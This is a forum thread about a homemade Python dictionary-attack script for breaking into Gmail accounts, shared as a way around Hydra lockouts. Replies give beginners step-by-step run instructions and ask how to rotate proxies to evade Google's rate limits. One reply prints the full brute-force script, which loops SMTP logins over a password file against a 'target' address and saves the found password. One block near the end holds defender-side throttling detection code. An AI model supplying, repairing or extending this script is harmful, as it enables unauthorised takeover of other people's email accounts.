Forum Thread: GMail Brute Force Dictionary Attack Script

Hey everybody.

So this week I've been making it my mission to learn a bit about THC Hydra and all the little bells and whistles it has to offer — trust me, there are A LOT.

I've noticed a lot on this forum and other sites that Gmail is really difficult to crack with Hydra, mostly because companies like Google have taken precautions against it. I've had some decent success with Hydra against Gmail, but decided to write my own dictionary attack script to see if I could do any better.

Well, I wrote my script to use TLS on port 587 instead of Hydra using SSL on 465. So far I've found I've had a MUCH higher success rate, whereas using Hydra kept getting me locked out. The script is really basic (less than 20 lines of actual code), but seems to be really powerful so far, so I decided to share.

http://pastebin.com/VLVHWyZq

I wrote this in Python and it takes no command line arguments. Just run the script and it will prompt you for what it needs.

Happy Hacking!

31 Responses

Wow, this is what I have been looking for! I have tried many times to brute force Gmail, but it blocks me every time I reach something like 200 attempts :D

TY, I hope it works :D

Awesome! Please let me know how it works out for you. For whatever reason it seems like certain addresses are more "secure" than others and lockouts occur a lot sooner.

Actually, I know nothing about programming :/
I thought I could just copy your script into Python, but I can't even find Python in Kali ><

can you please explain to a "noobie" how to try this. details pls.
thank you

Ok friend. What you want to do is you want to open the terminal and type cd /root/Desktop/
nano gmail.py
paste the contents
press ctrl + x
y
enter
then do chmod 775 gmail.py
python gmail.py
and it should start doing the program

Can you please help me? It is saying that my correct password is incorrect.

Found it, but can you please tell me how to get this to work with other mail services?

Se7enpeace:

The two scripts do the exact same thing using different programs, but written in two different languages. Thanks for pointing that out though!

That script actually uses Hydra to do the work. The one I wrote is completely independent of Hydra and uses a different encryption connection method (TLS instead of SSL).

Has anybody tested the script out? I'm not able to get it to work.

What happens when you try to run it?

I tried to use the script against an e-mail account I've created, and when it gets to the real password it labels it as incorrect.

I have tried it, but Gmail will block you after 100 attempts. It's not worth it. Unless you know a way to pass this block?

Wtf, it's not working. I have entered my password in passlist and then I do that, but it doesn't work. Can anyone help me?

Well, Gmail terminates the connection after every 100 attempts or so... this makes it pretty useless. A solution might be to include a change of proxy in the present code. Can someone post the code for that or give an idea how to code it?

Thanks!

Someone mentioned earlier that for some accounts, Gmail seems to terminate/block the IP much earlier, in my case... after a feeble 12 attempts! I was using Hydra though, have not tried this script - has it been updated to change proxy every xxx attempts? Could you make it so that we can adjust the number of attempts - as others have quoted 100-150, but mine was as low as 12??? Thanks!

Do this script proxy server and send me

Do you actually know if a proxy will thwart their brute force protection? Or is this just based on assumptions?

They may have different levels of throttling: e.g., 100 attempts per IP in (x) hours, ban that IP for a couple hours, 200 attempts by ANY IP in (x) hours, prevent all logins to account (any IP) for a couple hours, etc.
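The layered throttling guessed at in the post above, written from the mail provider's side as an added example (not code from this thread or from Google): it counts failed logins per (account, IP) and per account across all IPs inside a sliding window. The 100 and 200 limits come from the post; the one-hour window, the event tuple layout and every sample address are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

# Limits quoted in the post above; the window length is an assumption,
# since the post leaves it as "(x) hours".
PER_IP_LIMIT = 100
PER_ACCOUNT_LIMIT = 200
WINDOW_SECONDS = 3600

def detect_throttle_events(events, per_ip=PER_IP_LIMIT,
                           per_account=PER_ACCOUNT_LIMIT,
                           window=WINDOW_SECONDS):
    """Scan (ts, account, ip, ok) tuples and apply both limits.

    Returns (blocked_ips, locked_accounts): the (account, ip) pairs that
    reached the per-IP limit and the accounts that reached the any-IP limit.
    """
    by_pair = defaultdict(deque)     # (account, ip) -> failure timestamps
    by_account = defaultdict(deque)  # account -> failure timestamps
    blocked_ips, locked_accounts = set(), set()
    for ts, account, ip, ok in sorted(events):
        if ok:
            continue  # only failed logins count toward the limits
        for key, bucket, limit, hits in (
            ((account, ip), by_pair, per_ip, blocked_ips),
            (account, by_account, per_account, locked_accounts),
        ):
            q = bucket[key]
            q.append(ts)
            while q and q[0] <= ts - window:  # expire old failures
                q.popleft()
            if len(q) >= limit:
                hits.add(key)
    return blocked_ips, locked_accounts

def constructed_events():
    """Constructed sample log: one noisy source, one spread-out campaign."""
    events = []
    # 120 failures from a single address: trips the per-IP limit.
    events += [(t * 10, "alice@example.com", "198.51.100.7", False)
               for t in range(120)]
    # 250 failures, 5 per source address: only the any-IP limit sees it.
    events += [(t * 10, "bob@example.com", f"203.0.113.{t // 5}", False)
               for t in range(250)]
    # A user who mistypes twice and then logs in: no alert.
    events += [(5, "carol@example.com", "192.0.2.10", False),
               (9, "carol@example.com", "192.0.2.10", False),
               (15, "carol@example.com", "192.0.2.10", True)]
    return events

if __name__ == "__main__":
    ips, accounts = detect_throttle_events(constructed_events())
    print("blocked (account, ip):", sorted(ips))
    print("locked accounts:", sorted(accounts))
```

In the constructed data the second account is locked even though no single source address comes near the per-IP limit, which is the case the per-account counter exists for.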

help please
NameError: name 'passwordfile

Every time I make this script this comes up: NameError passwordfile. Help, guys.

Hello, I'm sorry to sound stupid because I am not very experienced with using python. After I enter the target's email address, the code asks for a password file name. What does this mean and what do I need to do?

You need to tell the program where the password file is (the file path). For example, if your password file is in /home/user/Desktop and the name of the file is password.txt, you should write /home/user/Desktop/password.txt and that's it. Hit enter and watch the magic happen. Cheers!

What is a password file?
What should I do if I'm trying to run the program from my smartphone?

@BURNCT I'm trying to get in contact with you. How do I message you directly? I'm stuck at the same spot you were in another post and I don't know if anyone ever figured it out. skype>djmasentertainment

Dude, I am a learner to Python.
I don't know how to apply this program.
What things will I have to put in manually?
Every time I run this, it says syntax error.
Please help me.

Step 1:

Help me

This script is not proper doing, password is incorrect.

The reason this script does not work is because he didn't write it. The original author is Toxic-ig. The script is a small section of the file gmail.py in the program Trity, so if you want it to work right, download it off of GitHub.

If the program stops and you can't see the correct password, try this:
import smtplib
import pathlib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

user = input("Enter the target's email address: ")
passwfile = input("Enter the password file name: ")
passwfile = open(passwfile, "r")

for password in passwfile:
try:
smtpserver.login(user, password)
print("+ Password Found: %s" % password)
pathlib.Path("output.txt").write_text("%s" % password)
exit()

except smtplib.SMTPAuthenticationError:
print("!XxXxXxXxXxXxXxXxXxXx Password Incorrect: %s" % password)
#MAKE SURE U ADD THE PATHLIB
#THIS WILL CREATE A NOTEPAD FILE WHICH WILL STORE THE CORRECT PASSWORD

Did anyone figure out how to bypass the 100 tries?

This is a nice script, but it could not be used for practical purposes. As Google is a top company in the market, it uses a high-security process. This script could only be used when the target has less secure apps enabled in the security settings of their Google account. Otherwise this script would not work.

I am fully new and I want some guidance, and the link is not working: "This site can't be reached". Please send me another link and recommend me a tutorial.
